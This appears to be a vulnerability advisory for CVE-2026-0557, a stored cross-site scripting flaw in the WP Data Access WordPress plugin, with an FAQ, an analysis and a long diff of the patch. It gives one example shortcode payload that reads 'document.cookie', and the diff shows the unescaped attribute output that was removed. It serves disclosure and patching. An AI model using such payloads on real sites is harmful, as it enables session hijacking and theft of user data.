What is CVE-2026-0557?

CVE-2026-0557 is a stored cross-site scripting (XSS) vulnerability in the WP Data Access plugin for WordPress. It allows authenticated users with contributor privileges and higher to inject malicious scripts via the ‘wpda_app’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient sanitization and escaping of user-supplied attributes in the ‘wpda_app’ shortcode. An attacker can craft a shortcode with malicious JavaScript that executes when the page is viewed by other users.

Who is affected by this vulnerability?

Any WordPress site using WP Data Access version 5.5.63 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Data Access plugin installed. If it is version 5.5.63 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

To fix this vulnerability, update the WP Data Access plugin to version 5.5.64 or later, where the issue has been patched. Regularly check for updates to ensure continued security.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means it requires authenticated access to exploit but can lead to significant consequences, including the potential for session hijacking and content manipulation.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to inject scripts that can steal cookies, perform actions on behalf of users, deface content, or distribute malware. The stored nature of the XSS means it affects all users viewing the compromised page.

What is a proof of concept (PoC) in this context?

A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC illustrates how an attacker can create a post with a malicious shortcode to execute JavaScript in the browsers of users who view the post.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP Data Access plugin until it can be updated. Additionally, restrict contributor access or monitor user activities closely to prevent exploitation.

How can I protect my WordPress site from future vulnerabilities?

To protect your site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong user access controls. Conduct periodic security audits to identify and remediate potential risks.

Is there a way to report vulnerabilities in plugins?

Yes, if you discover a vulnerability in a plugin, you can report it to the plugin developers through their official support channels or security reporting mechanisms. Responsible disclosure helps improve the security of the WordPress ecosystem.

What are the implications of stored XSS vulnerabilities?

Stored XSS vulnerabilities can have severe implications as the malicious script is saved on the server and executed whenever the affected page is accessed. This can lead to widespread compromise of user sessions and sensitive data exposure.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0557: WP Data Access <= 5.5.63 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpda_app' Shortcode (wp-data-access)

CVE ID CVE-2026-0557

Plugin wp-data-access

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 5.5.63

Patched Version 5.5.64

Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0557:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Data Access WordPress plugin. The vulnerability affects the ‘wpda_app’ shortcode handler, allowing contributor-level and higher authenticated users to inject malicious scripts into pages. The CVSS score of 6.4 reflects the moderate impact requiring authenticated access but enabling persistent script execution.

The root cause is insufficient input sanitization and output escaping of user-supplied shortcode attributes in the WPDA_App_Container class. Specifically, the vulnerability exists in the WPDA_App_Container.php file at lines 133-148 where shortcode arguments are processed. The vulnerable code directly outputs user-controlled values without proper sanitization, using implode() on array values that contain unsanitized shortcode attributes passed to the ‘wpda_app’ shortcode.

Exploitation requires an authenticated attacker with at least contributor privileges to create or edit posts/pages containing the ‘wpda_app’ shortcode. The attacker would craft malicious shortcode attributes containing JavaScript payloads. For example: [wpda_app app_id=”1″ malicious_attribute=”alert(document.cookie)”]. When the page renders, the plugin processes these attributes and outputs them without escaping, executing the script in victims’ browsers.

The patch adds comprehensive sanitization in WPDA_App_Container.php lines 133-148. The fix introduces multiple sanitization layers: WPDA_API_Core::sanitize_db_identifier() for field names, sanitize_text_field() for values, wp_strip_all_tags() to remove HTML, and str_replace() to strip dangerous characters including quotes, backticks, angle brackets, and equals signs. Finally, esc_attr() ensures proper HTML attribute escaping before output. This multi-layered approach neutralizes XSS payloads while preserving legitimate shortcode functionality.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes whenever users view the compromised page. This enables session hijacking, administrative actions through forged requests, content defacement, and malware distribution. The stored nature means the payload persists across sessions and affects all users viewing the page, including administrators.

Differential between vulnerable and patched code

Code Diff

--- a/wp-data-access/WPDataAccess/API/WPDA_API.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_API.php
@@ -27,8 +27,7 @@

 					if (
                         '/' . self::WPDA_NAMESPACE === $rest_route &&
-                        ! current_user_can( 'manage_options' ) &&
-                        ! current_user_can( 'manage_sites' )
+                        ! WPDA::current_user_is_admin()
                     ) {
 						return new WP_Error(
 							'rest_cannot_access',
--- a/wp-data-access/WPDataAccess/API/WPDA_Apps.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_Apps.php
@@ -1697,7 +1697,7 @@
         $map,
         $theme
     ) {
-        if ( 1 > $app_id || 1 > $cnt_id || 'table' !== $target && 'form' !== $target && 'rform' !== $target && 'theme' !== $target && 'chart' !== $target && 'map' !== $target ) {
+        if ( 1 > $app_id || 1 > $cnt_id || 'table' !== $target && 'form' !== $target && 'rform' !== $target && 'theme' !== $target && 'chart' !== $target && 'map' !== $target && 'dashboard' !== $target ) {
             return $this->bad_request();
         }
         if ( null === $settings || '' === $settings ) {
@@ -1743,6 +1743,14 @@
                         ));
                     }
                     break;
+                case 'dashboard':
+                    $error_msg = WPDA_App_Container_Model::update_dashboard_settings( $app_id, null );
+                    if ( '' !== $error_msg ) {
+                        return new WP_Error('error', $error_msg, array(
+                            'status' => 403,
+                        ));
+                    }
+                    break;
                 default:
                     return $this->bad_request();
             }
@@ -1806,6 +1814,15 @@
                                     'status' => 403,
                                 ));
                             }
+                        } else {
+                            if ( 'dashboard' === $target ) {
+                                $error_msg = WPDA_App_Container_Model::update_dashboard_settings( $cnt_id, $settings );
+                                if ( '' !== $error_msg ) {
+                                    return new WP_Error('error', $error_msg, array(
+                                        'status' => 403,
+                                    ));
+                                }
+                            }
                         }
                     }
                 }
--- a/wp-data-access/WPDataAccess/API/WPDA_Table.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_Table.php
@@ -1205,7 +1205,7 @@
     }

     private function get_table_access( $dbs, $tbl ) {
-        if ( current_user_can( 'manage_options' ) ) {
+        if ( WPDA::current_user_is_admin() ) {
             // Check administrator rights
             if ( is_admin() ) {
                 $access = WPDA_Dictionary_Access::check_table_access_backend( $dbs, $tbl, $done );
--- a/wp-data-access/WPDataAccess/Dashboard/WPDA_Dashboard.php
+++ b/wp-data-access/WPDataAccess/Dashboard/WPDA_Dashboard.php
@@ -332,13 +332,13 @@
      * @return string
      */
     protected function get_help_url() {
-        $help_root = 'https://wpdataaccess.com/docs/';
+        $help_url = 'https://docs.wpdataaccess.com/';
         if ( isset( $_REQUEST['page'] ) ) {
             // phpcs:ignore WordPress.Security.NonceVerification
             switch ( $_REQUEST['page'] ) {
                 // phpcs:ignore WordPress.Security.NonceVerification
                 case WP_Data_Access_Admin::PAGE_MAIN:
-                    $help_url = $help_root . 'data-explorer/data-explorer-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-explorer-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_APPS:
                     $help_url = 'https://docs.rad.wpdataaccess.com/';
@@ -347,22 +347,22 @@
                     $help_url = 'https://docs.sql.wpdataaccess.com/';
                     break;
                 case WP_Data_Access_Admin::PAGE_DESIGNER:
-                    $help_url = $help_root . 'data-designer/data-designer-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_PUBLISHER:
-                    $help_url = $help_root . 'data-tables/data-tables-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_DASHBOARD:
-                    $help_url = $help_root . 'dashboards-and-widgets/bi-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_CHARTS:
-                    $help_url = $help_root . 'charts-legacy/chart-widgets/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/chart-widgets/';
                     break;
                 case WPDP::PAGE_MAIN:
-                    $help_url = $help_root . 'data-forms/data-projects/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-projects/';
                     break;
                 case WPDP::PAGE_TEMPLATES:
-                    $help_url = $help_root . 'templates/project-templates/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/project-templates/';
                     break;
                 case 'wpdataaccess':
                     $current_tab = ( isset( $_REQUEST['tab'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['tab'] ) ) : 'plugin' );
@@ -424,15 +424,9 @@
                                     $help_url = 'https://docs.settings.wpdataaccess.com/legacy-tools-plugin.html';
                             }
                             break;
-                        default:
-                            $help_url = 'https://docs.settings.wpdataaccess.com/';
                     }
                     break;
-                default:
-                    $help_url = 'https://docs.wpdataaccess.com/';
             }
-        } else {
-            $help_url = 'https://docs.wpdataaccess.com/';
         }
         return $help_url;
     }
@@ -730,7 +724,7 @@
 						<?php
         }
         ?>
-					<li class="menu-item"><a target="_blank" href="https://wpdataaccess.com/documentation/"><i class="fas fa-question"></i> Online Documentation</a></li>
+					<li class="menu-item"><a target="_blank" href="https://docs.wpdataaccess.com/"><i class="fas fa-question"></i> Online Documentation</a></li>
 					<li class="menu-item"><a target="_blank" href="https://wordpress.org/support/plugin/wp-data-access/"><i class="fas fa-life-ring"></i> Support Forum</a></li>
 					<?php
         ?>
@@ -844,7 +838,7 @@
 							</td>
 							<td style="white-space:nowrap">
 								<a href="https://wpdataaccess.com/pricing/" target="_blank" class="button button-primary">UPGRADE TO PREMIUM</a>
-								<a href="https://wpdataaccess.com/docs/dashboards-and-widgets/bi-getting-started/" target="_blank" class="button">READ MORE</a>
+								<a href="https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/" target="_blank" class="button">READ MORE</a>
 							</td>
 						</tr>
 					</table>
@@ -1105,15 +1099,6 @@
 								<i class="fas fa-toggle-on"></i>
 								<span>Switch to old Data Explorer</span>
 							</a>
-							<span>
-								<a href="https://wpdataaccess.com/2024/01/26/the-new-data-explorer-wp-data-access-5-4-0/"
-								   target="_blank"
-								   class="wpda_tooltip"
-								   title="Click to read more"
-								>
-									<i class="fas fa-circle-info"></i>
-								</a>
-							</span>
 						</span>
 						<?php
         }
@@ -1690,7 +1675,7 @@
 							<?php
         if ( !class_exists( 'Code_Manager\Code_Manager_Model' ) || !class_exists( 'WPDataAccess\Premium\WPDAPRO_Dashboard\WPDAPRO_Widget_Project' ) ) {
             ?>
-								<a href="https://wpdataaccess.com/docs/dashboards-and-widgets/bi-getting-started/" target="_blank">
+								<a href="https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/" target="_blank">
 									<i class="fas fa-question-circle pointer wpda_tooltip"
 									   style="font-size: 170%; vertical-align: middle"
 									   title="Your installation does not support all available widget types! Click to learn how to install more widget types..."></i>
@@ -2277,61 +2262,9 @@
             case 'templates':
             case 'charts':
                 $promotions = array(array(
-                    'This tool will transition to the new App Builder. Please migrate on time.' => array(null, 'fa-lightbulb'),
-                ));
-                break;
-            case 'csv':
-                $promotions = array(array(
-                    'Use the connection wizards for automated CSV synchronization.' => array('https://wpdataaccess.com/docs/remote-data-files/csv-files/', 'fa-lightbulb'),
+                    'This tool will be transitioned to the new App Builder. Please migrate on time.' => array(null, 'fa-lightbulb'),
                 ));
                 break;
-            case 'publisher_OLD':
-                $promotions = array(
-                    array(
-                        'Change data table color, spacing, border radius and modal popup behaviour.' => array('https://wpdataaccess.com/data-tables-styling/premium-styling/', 'fa-palette'),
-                    ),
-                    array(
-                        'Reorder data table elements with drag and drop.' => array('https://wpdataaccess.com/docs/data-tables/extension-manager/', 'fa-star'),
-                    ),
-                    array(
-                        'Add buttons to support CSV, Excel, PDF and SQL downloads.' => array('https://wpdataaccess.com/docs/data-tables/extension-manager/', 'fa-cloud-download'),
-                    ),
-                    array(
-                        'Add user friendly Search Panes to simplify searching.' => array('https://wpdataaccess.com/docs/data-tables-interactive-filters/search-panes/', 'fa-magic'),
-                    ),
-                    array(
-                        'Use the Search Builder to add interactive searching.' => array('https://wpdataaccess.com/docs/data-tables-interactive-filters/search-builder/', 'fa-search'),
-                    ),
-                    array(
-                        'Synchronize your Google Sheets from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/public-url/#google-sheets', 'fa-database'),
-                    )
-                );
-                break;
-            case 'wpda':
-                $promotions = array(
-                    array(
-                        'Access your SQL Server tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/sql-server/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your PostgreSQL tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/postgresql/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your Oracle tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/oracle/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your remote MariaDB | MySQL tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/mariadb-mysql/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your CSV files directly from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/csv-files/', 'fa-lightbulb'),
-                    ),
-                    array(
-                        'Access your MS Access tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/ms-access/', 'fa-database'),
-                    ),
-                    array(
-                        'Synchronize your Google Sheets from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/public-url/#google-sheets', 'fa-database'),
-                    )
-                );
-                break;
             default:
                 $promotions = array();
         }
--- a/wp-data-access/WPDataAccess/Data_Apps/WPDA_App_Container.php
+++ b/wp-data-access/WPDataAccess/Data_Apps/WPDA_App_Container.php
@@ -2,6 +2,7 @@

 namespace WPDataAccessData_Apps {

+    use WPDataAccessAPIWPDA_API_Core;
     use WPDataAccessAPIWPDA_Apps;
     use WPDataAccessPlugin_Table_ModelsWPDA_App_Apps_Model;
     use WPDataAccessPlugin_Table_ModelsWPDA_App_Model;
@@ -60,7 +61,7 @@
 					return;
 				}

-				$this->show_feedback( __( 'Invalid app id', 'wp-data-access' ) );
+				$this->show_feedback( __( 'Not authorized', 'wp-data-access' ) );
 				return;
 			}

@@ -111,6 +112,11 @@
                 case '6':
                     // Chart
                     $app_type_class = 'pp-container-chart';
+                    break;
+                case '7':
+                    // Chart
+                    $app_type_class = 'pp-container-dashboard';
+                    break;
             }
 			?>

@@ -127,12 +133,25 @@
 						<?php
 					}

-					if ( 0 < count( $this->shortcode_args ) ) {
-						?>
-						data-shortcode_field_name="<?php echo implode( ',', array_keys( $this->shortcode_args ) ); ?>"
-						data-shortcode_field_value="<?php echo implode( ',', array_values( $this->shortcode_args ) ); ?>"
-						<?php
-					}
+                    if ( 0 < count( $this->shortcode_args ) ) {
+                        $field_names  = array();
+                        $field_values = array();
+                        foreach ( $this->shortcode_args as $key => $value ) {
+                            // Sanitize field name
+                            $field_names[] = WPDA_API_Core::sanitize_db_identifier( $key );
+                            // Sanitize field value
+                            $sanitized_value = sanitize_text_field( $value );
+                            $sanitized_value = wp_strip_all_tags( $value );
+                            $sanitized_value = str_replace( array( '"', "'", '`' ), '', $sanitized_value );
+                            $sanitized_value = str_replace( array( '<', '>' ), '', $sanitized_value );
+                            $sanitized_value = str_replace( '=', '', $sanitized_value );
+                            $field_values[] = $sanitized_value;
+                        }
+                        ?>
+                        data-shortcode_field_name="<?php echo esc_attr( implode( ',', $field_names) ); ?>"
+                        data-shortcode_field_value="<?php echo esc_attr( implode( ',', $field_values ) ); ?>"
+                        <?php
+                    }
 					?>
 				></div>
 			</div>
--- a/wp-data-access/WPDataAccess/Data_Publisher/WPDA_Publisher_Form.php
+++ b/wp-data-access/WPDataAccess/Data_Publisher/WPDA_Publisher_Form.php
@@ -108,7 +108,7 @@
         );
         $this->check_table_type = false;
         $this->title = 'Data Tables';
-        $args['help_url'] = 'https://wpdataaccess.com/docs/data-tables/data-tables-getting-started/';
+        $args['help_url'] = 'https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/';
         parent::__construct(
             $schema_name,
             $table_name,
--- a/wp-data-access/WPDataAccess/Design_Table/WPDA_Design_Table_Form.php
+++ b/wp-data-access/WPDataAccess/Design_Table/WPDA_Design_Table_Form.php
@@ -1740,7 +1740,7 @@
 				}
 				?>
 				<div style="text-align:right">
-					<a href="https://wpdataaccess.com/docs/data-designer/data-designer-getting-started/"
+					<a href="https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/"
 					   target="_blank" style="text-decoration:none">
 						> What is the difference between a table design and a database table?
 					</a>
--- a/wp-data-access/WPDataAccess/Plugin_Table_Models/WPDA_App_Container_Model.php
+++ b/wp-data-access/WPDataAccess/Plugin_Table_Models/WPDA_App_Container_Model.php
@@ -210,6 +210,16 @@
         return $wpdb->last_error;
     }

+    public static function update_dashboard_settings( $cnt_id, $cnt_dashboard_settings ) {
+        global $wpdb;
+        $wpdb->update( static::get_base_table_name(), array(
+            'cnt_dashboard' => $cnt_dashboard_settings,
+        ), array(
+            'cnt_id' => $cnt_id,
+        ) );
+        return $wpdb->last_error;
+    }
+
     public static function update_map_settings( $cnt_id, $cnt_map_settings ) {
         global $wpdb;
         $wpdb->update( static::get_base_table_name(), array(
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Add_App_To_Menu.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Add_App_To_Menu.php
@@ -14,7 +14,6 @@

 		$apps = WPDA_App_Model::add_to_dashboard_menu();
 		foreach ( $apps as $app ) {
-
 			$settings = json_decode( $app['app_settings'], true );
 			if (
 				! isset(
@@ -39,7 +38,24 @@
 			}

 			$title = $settings['settings']['app_menu_title'];
-			if ( is_admin() ) {
+            $icon = 'dashicons-database-view';
+            switch ($app['app_type']) {
+                case 1:
+                case 3:
+                case 4:
+                    $icon = 'dashicons-edit';
+                    break;
+                case 2:
+                    $icon = 'dashicons-location';
+                    break;
+                case 6:
+                    $icon = 'dashicons-chart-bar';
+                    break;
+                case 7:
+                    $icon = 'dashicons-dashboard';
+                    break;
+            }
+            if ( is_admin() ) {
 				// Add app to dashboard menu
 				add_menu_page(
 					$title,
@@ -47,7 +63,7 @@
 					WPDA::get_current_user_capability(),
 					$title,
 					null,
-					'dashicons-database-view'
+                    $icon
 				);

 				add_submenu_page(
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Import.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Import.php
@@ -245,7 +245,7 @@
 							echo __( 'to', 'wp-data-access' );
 							echo ' <strong>';
 							echo __( 'On', 'wp-data-access' );
-							echo '</strong> (<a href="https://wpdataaccess.com/docs/getting-started/known-limitations/">';
+							echo '</strong> (<a href="https://docs.wpdataaccess.com/limitations.html">';
 							echo __( 'see documentation', 'wp-data-access' );
 							echo '</a>).';
 							?>
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Import_Multi.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Import_Multi.php
@@ -23,7 +23,7 @@
 	 */
 	class WPDA_Import_Multi {

-		const SOLUTIONS = '(<a href="https://wpdataaccess.com/docs/tool-guide/known-limitations/" target="_blank">see solutions</a>)';
+		const SOLUTIONS = '(<a href="https://docs.wpdataaccess.com/limitations.html" target="_blank">see solutions</a>)';

 		/**
 		 * URL where to post data
@@ -377,7 +377,7 @@
 							echo __( 'to', 'wp-data-access' );
 							echo ' <strong>';
 							echo __( 'On', 'wp-data-access' );
-							echo '</strong> (<a href="https://wpdataaccess.com/docs/tool-guide/known-limitations/">';
+							echo '</strong> (<a href="https://docs.wpdataaccess.com/limitations.html">';
 							echo __( 'see documentation', 'wp-data-access' );
 							echo '</a>).';
 							?>
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Remote_Database.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Remote_Database.php
@@ -510,7 +510,7 @@
 			<div class="restyle_link">
 				<strong>NOTE</strong>
 				Please activate your Premium Data Services access <a href="options-general.php?page=wpdataaccess&tab=pds">here</a> to remotely connect to foreign DBMSs and remote files.
-				<a href="https://wpdataaccess.com/docs/remote-connection-wizard/remote-wizard/" class="restyle_link" target="_blank">(read more...)</a>
+				<a href="https://docs.remote.wpdataaccess.com/pds/remote-wizard.html" class="restyle_link" target="_blank">(read more...)</a>
 			</div>
 			<?php
     }
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Table_Actions.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Table_Actions.php
@@ -571,7 +571,7 @@
 											<?php
         echo __( 'Table Settings', 'wp-data-access' );
         ?>
-											<a href="https://wpdataaccess.com/docs/data-explorer-settings/manage-table-settings/" target="_blank">
+											<a href="https://docs.legacy.wpdataaccess.com/docs/manage-table-settings/" target="_blank">
 												<span class="dashicons dashicons-editor-help wpda_tooltip"
 													  title="<?php
         echo __( 'Help opens in a new tab or window', 'wp-data-access' );
@@ -855,7 +855,7 @@
 											<?php
         echo __( 'Column Settings', 'wp-data-access' );
         ?>
-											<a href="https://wpdataaccess.com/docs/data-explorer-settings/column-settings/" target="_blank">
+											<a href="https://docs.legacy.wpdataaccess.com/docs/column-settings/" target="_blank">
 												<span class="dashicons dashicons-editor-help wpda_tooltip"
 													  title="<?php
         echo __( 'Help opens in a new tab or window', 'wp-data-access' );
@@ -1205,7 +1205,7 @@
 						<?php
         echo __( 'Dashboard Menus', 'wp-data-access' );
         ?>
-						<a href="https://wpdataaccess.com/docs/data-explorer-settings/dashboard-menus/" target="_blank">
+						<a href="https://docs.legacy.wpdataaccess.com/docs/dashboard-menus/" target="_blank">
 							<span class="dashicons dashicons-editor-help wpda_tooltip"
 								  title="<?php
         echo sprintf( __( 'Help opens in a new tab or window', 'wp-data-access' ), esc_attr( $this->table_name ) );
@@ -1418,7 +1418,7 @@
 						<?php
         echo __( 'Dynamic Hyperlinks', 'wp-data-access' );
         ?>
-						<a href="https://wpdataaccess.com/docs/data-explorer-settings/dynamic-hyperlinks/" target="_blank">
+						<a href="https://docs.legacy.wpdataaccess.com/docs/dynamic-hyperlinks/" target="_blank">
 							<span class="dashicons dashicons-editor-help wpda_tooltip"
 								  title="<?php
         echo sprintf( __( 'Help opens in a new tab or window', 'wp-data-access' ), esc_attr( $this->table_name ) );
--- a/wp-data-access/WPDataAccess/WPDA.php
+++ b/wp-data-access/WPDataAccess/WPDA.php
@@ -51,8 +51,8 @@
 		/**
 		 * Option wpda_version and it's default value
 		 */
-		const OPTION_WPDA_VERSION         = array( 'wpda_version', '5.5.63' );
-		const OPTION_WPDA_CLIENT_VERSION  = array( 'wpda_client_version', '1.0.63' );
+		const OPTION_WPDA_VERSION         = array( 'wpda_version', '5.5.64' );
+		const OPTION_WPDA_CLIENT_VERSION  = array( 'wpda_client_version', '1.0.64' );
 		const OPTION_WPDA_UPGRADED        = array( 'wpda_upgraded', false );
 		/**
 		 * Option wpda_setup_error and it's default value
@@ -1387,7 +1387,7 @@
 		public static function validate_name_failed() {
 			$title   = __( 'Schema, table or column name(s) restricting plugin features (click to read more and fix)', 'wp-data-access' );
 			$warning = "
-				<a href='https://wpdataaccess.com/docs/data-explorer/naming-conventions/' target='_blank' style='text-decoration:none'>
+				<a href='https://docs.legacy.wpdataaccess.com/docs/naming-conventions/' target='_blank' style='text-decoration:none'>
 					<span class='dashicons dashicons-flag wpda_tooltip' style='color:red;padding-left:5px' title='$title'></span>
 				</a>";
 			return $warning;
@@ -1396,7 +1396,7 @@
 		public static function validate_name_np() {
 			$title   = __( 'Schema, table or column name validation not possible (click to read more and fix)', 'wp-data-access' );
 			$warning = "
-				<a href='https://wpdataaccess.com/docs/data-explorer/naming-conventions/' target='_blank'>
+				<a href='https://docs.legacy.wpdataaccess.com/docs/naming-conventions/' target='_blank'>
 					<span class='dashicons dashicons-warning wpda_tooltip' style='padding-left:5px' title='$title'></span>
 				</a>";
 			return $warning;
@@ -1684,7 +1684,7 @@
 		}

         public static function current_user_is_admin() {
-            return current_user_can( 'manage_options' );
+            return current_user_can( 'manage_options' ) || is_super_admin();
         }

 	}
--- a/wp-data-access/WPDataAccess/WPDA_Navi/WPDA_Navi.php
+++ b/wp-data-access/WPDataAccess/WPDA_Navi/WPDA_Navi.php
@@ -198,7 +198,7 @@
                                 A data-driven Rapid Application Development tool.
                             </span>

-                            <a href="https://wpdataaccess.com/docs/app-builder/road-map/" target="_blank" class="roadmap">ROAD MAP</a>
+                            <span></span>
 						</div>

 						<div class="wpda-navi-container-content-item-content">
@@ -214,11 +214,11 @@

 						<div class="wpda-navi-container-content-item-facts">
 							<ul>
-								<li>Intuitive Table Builder for creating data tables with ease.</li>
-								<li>Highly customizable Form Builder for designing data entry forms.</li>
-								<li>Integrated Theme Builder to personalize app styling.</li>
-								<li>Interactive Chart Builder for real-time data analysis.</li>
-                                <li>Visualize location data from SQL queries with the Map Builder.</li>
+								<li>Intuitive <strong>Table Builder</strong> for creating data tables with ease.</li>
+								<li>Highly customizable <strong>Form Builder</strong> for designing data entry forms.</li>
+								<li>Integrated <strong>Theme Builder</strong> to personalize app styling.</li>
+								<li>Interactive <strong>Chart Builder</strong> for real-time data analysis.</li>
+                                <li>Visualize location data from SQL queries with the <strong>Map Builder</strong>.</li>
 							</ul>
 						</div>
 					</div>
@@ -229,7 +229,7 @@
 							<h3>Explorer</h3>
 							<div class="wpda-navi-container-content-item-title-help">
 								<a
-										href="https://wpdataaccess.com/docs/data-explorer/data-explorer-getting-started/"
+										href="https://docs.legacy.wpdataaccess.com/docs/data-explorer-getting-started/"
 										target="_blank"
 										class="wpda_tooltip"
 										title="View online documentation"
@@ -353,21 +353,14 @@
                                     </a>
                                 </li>
                                 <li>
-                                    <span class="wpda-new">
-                                        Get help directly from within all builders.
-                                    </span>
+                                    Images and hyperlinks are now displayed in PDF exports.
                                 </li>
                                 <li>
-                                    Automate your data exports (new Data Explorer only).
+                                    Media type configuration within the Table and Form Builder.
                                 </li>
                                 <li>
-                                    <a href="https://docs.rad.wpdataaccess.com/map-builder/" target="_blank" class="whatsnew">
-                                        Display geographic data on interactive maps using SQL queries.
-                                    </a>
-                                </li>
-                                <li>
-                                    <a href="https://docs.rad.wpdataaccess.com/hooks/" target="_blank" class="whatsnew">
-                                        Extended Hooks for Tables and Forms.
+                                    <a href="https://docs.rad.wpdataaccess.com/app-manager/running-apps/shortcodes/shortcode-usage.html#%E2%9C%A8-start-in-full-screen-mode" target="_blank" class="whatsnew">
+                                        Start all app types (except maps) in full-screen mode.
                                     </a>
                                 </li>
 							</ul>
@@ -442,35 +435,19 @@
 							</span>
 						</button>

-						<button
-							onClick="window.open('https://wpdataaccess.com/documentation/', '_blank')"
-						>
-							<span class="wpda-hot-title">
-								Documentation
-							</span>
-							<span class="wpda-hot-topic">
-								Where can I find the online documentation?
-							</span>
-						</button>
-
-						<button>
+                        <button
+                                onClick="window.open('https://docs.rad.wpdataaccess.com/hooks/', '_blank')"
+                        >
 							<span class="wpda-hot-title">
-								Downloadable Demo Apps
+								App Builder Hooks
 							</span>
-							<span class="wpda-hot-topic" style="display: inline-grid; grid-template-columns: auto auto; gap: 20px;">
-                                <a href="https://wpdataaccess.com/docs/app-demos/app-student-administration-system/" target="_blank">
-                                    <i class="fa-solid fa-up-right-from-square"></i>
-                                    Student Administration System
-                                </a>
-                                <a href="https://wpdataaccess.com/docs/app-demos/app-classic-models/" target="_blank">
-                                    <i class="fa-solid fa-up-right-from-square"></i>
-                                    Classic Models
-                                </a>
+                            <span class="wpda-hot-topic">
+                                Write hook to customize app behavior.
 							</span>
-						</button>
+                        </button>

 						<button
-							onClick="window.open('https://wpdataaccess.com/docs/remote-databases/mysql-mariadb/', '_blank')"
+							onClick="window.open('https://docs.remote.wpdataaccess.com/mysql.html', '_blank')"
 						>
 							<span class="wpda-hot-title">
 								Remote connections
@@ -481,7 +458,7 @@
 						</button>

 						<button
-							onClick="window.open('https://wpdataaccess.com/docs/remote-connection-wizard/start-here/', '_blank')"
+							onClick="window.open('https://docs.remote.wpdataaccess.com/pds/start-here.html', '_blank')"
 						>
 							<span class="wpda-hot-title">
 								Premium Data Services
@@ -490,6 +467,17 @@
 								How can I use Premium Data Services for remote connections?
 							</span>
 						</button>
+
+                        <button
+                                onClick="window.open('https://docs.rad.wpdataaccess.com/', '_blank')"
+                        >
+							<span class="wpda-hot-title">
+								Documentation
+							</span>
+                            <span class="wpda-hot-topic">
+								Where can I find the online documentation?
+							</span>
+                        </button>
 					</div>
 				</div>
 			</div>
--- a/wp-data-access/WPDataProjects/WPDP.php
+++ b/wp-data-access/WPDataProjects/WPDP.php
@@ -203,7 +203,7 @@
         echo $this->projects_page_title;
         ?></span>
 					<a href="<?php
-        echo 'https://wpdataaccess.com/docs/data-forms/data-projects/';
+        echo 'https://docs.legacy.wpdataaccess.com/docs/data-projects/';
         ?>" target="_blank">
 						<span class="dashicons dashicons-editor-help"
 							  style="text-decoration:none;vertical-align:top;font-size:30px;">
@@ -228,7 +228,7 @@
         echo $this->projects_page_title;
         ?></span>
 					<a href="<?php
-        echo 'https://wpdataaccess.com/docs/templates/project-templates/';
+        echo 'https://docs.legacy.wpdataaccess.com/docs/project-templates/';
         ?>" target="_blank">
 						<span class="dashicons dashicons-editor-help"
 							  style="text-decoration:none;vertical-align:top;font-size:30px;">
--- a/wp-data-access/admin/class-wp-data-access-admin.php
+++ b/wp-data-access/admin/class-wp-data-access-admin.php
@@ -1055,7 +1055,7 @@
 		<div class="wrap">
 			<h1 class="wp-heading-inline">
 				<span>Data Designer</span>
